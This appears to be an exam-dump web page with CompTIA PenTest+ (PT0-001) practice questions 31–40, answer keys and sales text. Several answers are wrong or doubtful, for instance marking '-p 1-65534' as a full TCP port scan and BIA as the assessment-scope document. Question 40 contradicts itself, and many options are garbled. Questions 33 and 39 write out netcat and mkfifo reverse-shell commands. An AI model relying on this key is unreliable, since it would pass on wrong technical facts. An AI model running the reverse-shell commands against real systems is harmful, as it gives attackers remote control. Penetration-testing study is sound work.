Enjoy 15% Discount With Coupon 15off

CompTIA PT0-001 CompTIA PenTest+ Certification Exam Online Training

CompTIA PT0-001 CompTIA PenTest+ Certification Exam Online Training

CompTIA PT0-001 Online Training

The questions for PT0-001 were last updated at Jan 05,2025.
  • Exam Code: PT0-001
  • Exam Name: CompTIA PenTest+ Certification Exam
  • Certification Provider: CompTIA
  • Latest update: Jan 05,2025
Question #31

Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?

  • A . Stack pointer register
  • B . Index pointer register
  • C . Stack base pointer
  • D . Destination index register

Reveal Solution Hide Solution

Correct Answer: A
A

Explanation:

Reference: http://www.informit.com/articles/article.aspx?p=704311&seqNum=3
Question #32

Which of the following documents BEST describes the manner in which a security assessment will be conducted?

  • A . BIA
  • B . SOW
  • C . SLA
  • D . MSA

Reveal Solution Hide Solution

Correct Answer: A
Question #33

A penetration tester has compromised a system and wishes to connect to a port on it from the attacking machine to control the system.

Which of the following commands should the tester run on the compromised system?

  • A . nc looalhot 4423
  • B . nc -nvlp 4423 -« /bin/bash
  • C . nc 10.0.0.1 4423
  • D . nc 127.0.0.1 4423 -e /bin/bash

Reveal Solution Hide Solution

Correct Answer: B
Question #34

A penetration tester is preparing for an assessment of a web server’s security, which is used to host several sensitive web applications. The web server is PKI protected, and the penetration tester reviews the certificate presented by the server during the SSL handshake .

Which of the following certificate fields or extensions would be of MOST use to the penetration tester during an assessment?

  • A . Subject key identifier
  • B . Subject alternative name
  • C . Authority information access
  • D . Service principal name

Reveal Solution Hide Solution

Correct Answer: C
C

Explanation:

Reference: http://www.pkiglobe.org/auth_info_access.html
Question #35

A constant wants to scan all the TCP Pots on an identified device .

Which of the following Nmap switches will complete this task?

  • A . -p-
  • B . -p ALX,
  • C . -p 1-65534
  • D . -port 1-65534

Reveal Solution Hide Solution

Correct Answer: C
Question #36

A penetration tester must assess a web service .

Which of the following should the tester request during the scoping phase?

  • A . XSD
  • B . After-hours contact escalation
  • C . WSDLfile
  • D . SOAP project file

Reveal Solution Hide Solution

Correct Answer: C
Question #37

A penetration tester is assessing the security of a web form for a client and enters “;id” in one of the fields.

The penetration tester observes the following response:

Based on the response, which of the following vulnerabilities exists?

  • A . SQL injection
  • B . Session hijacking
  • C . Command injection
  • D . XSS/XSRF

Reveal Solution Hide Solution

Correct Answer: C
C

Explanation:

Reference: https://null-byte.wonderhowto.com/how-to/find-exploits-get-root-with-linux-exploit-suggester-0206005/
Question #38

A penetration tester has been asked to conduct OS fingering with Nmap using a company-provided text file that contains a list of IP addresses .

Which of the following are needed to conduct this scan? (Choose two.)

  • A . -O
  • B . -iL
  • C . -sV
  • D . -sS
  • E . -oN
  • F . -oX

Reveal Solution Hide Solution

Correct Answer: A,B
Question #39

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5 .

Which of the following are possible ways to do so? (Select TWO)

  • A . nc 192.168.1.5 44444
  • B . nc -nlvp 4444 -e /bin/sh
  • C . rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh CI 2>&1|nc 192.168.1.5 44444>/tmp /f
  • D . nc -e /bin/sh 192.168.1.5 4444
  • E . rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh CI 2>&1|nc 192.168.1.5 444444>/tmp /f
  • F . rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh CI 2>&1|nc 192.168.5.1 44444>/tmp /f

Reveal Solution Hide Solution

Correct Answer: D,F
Question #40

A penetration tester ran the following Nmap scan on a computer:

nmap -aV 192.168.1.5

The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH .

Which of the following is the BEST explanation for what happened?

  • A . The organization failed to disable Telnet.
  • B . Nmap results contain a false positive for port 23.
  • C . Port 22 was filtered.
  • D . The service is running on a non-standard port.

Reveal Solution Hide Solution

Correct Answer: A
Previous Questions Next Questions
Latest PT0-001 Dumps Valid Version with 248 Q&As

Latest And Valid Q&A | Instant Download | Once Fail, Full Refund

Instant Download PT0-001 PDF
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments

Related Posts

07Sep

CompTIA 220-1102 CompTIA A+ Certification Core 2 Exam Online Training

Question #1 A user contacts a technician about an issue with a laptop. The user states applications open without being launched... read more

30Aug

CompTIA CV0-004 CompTIA Cloud+ (2024) Online Training

Question #1 An engineer made a change to an application and needs to select a deployment strategy that meets the following... read more

25Feb

CompTIA CS0-003 CompTIA Cybersecurity Analyst (CySA+) Exam Online Training

Question #1 A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant... read more

30May

CompTIA XK0-005 CompTIA Linux+ Exam Online Training

Question #1 An administrator accidentally deleted the /boot/vmlinuz file and must resolve the issue before the server is rebooted. Which of... read more

22Oct

CompTIA CAS-003 CompTIA Advanced Security Practitioner (CASP) Online Training

Question #1 A security engineer must establish a method to assess compliance with company security policies as they apply to the... read more

17Oct

CompTIA CV0-002 CompTIA Cloud+ Exam Online Training

Question #1 A company is required to ensure all access to its cloud instance for all users to utilize two-factor authentication.... read more

10Sep

CompTIA SK0-005 CompTIA Server+ Certification Exam Online Training

Question #1 Which of the following is typical of software licensing in the cloud? A . Per socketB . PerpetualC . Subscription-basedD... read more

20Oct

CompTIA 220-1001 CompTIA A+ Certification Exam: Core 1 Online Training

Question #1 Which of the following is the MOST likely cause for a network PC to have an APIPA address? A .... read more

13Oct

CompTIA CV1-003 CompTIA Cloud+ Certification Beta Exam Online Training

Question #1 SIMULATION A company has decided to scale its e-commerce application from its corporate datacenter to a commercial cloud provider... read more

26Oct

CompTIA CAS-004 CompTIA Advanced Security Practitioner (CASP+) Exam Online Training

Question #1 An organization is referencing NIST best practices for BCP creation while reviewing current internal organizational processes for mission-essential items.... read more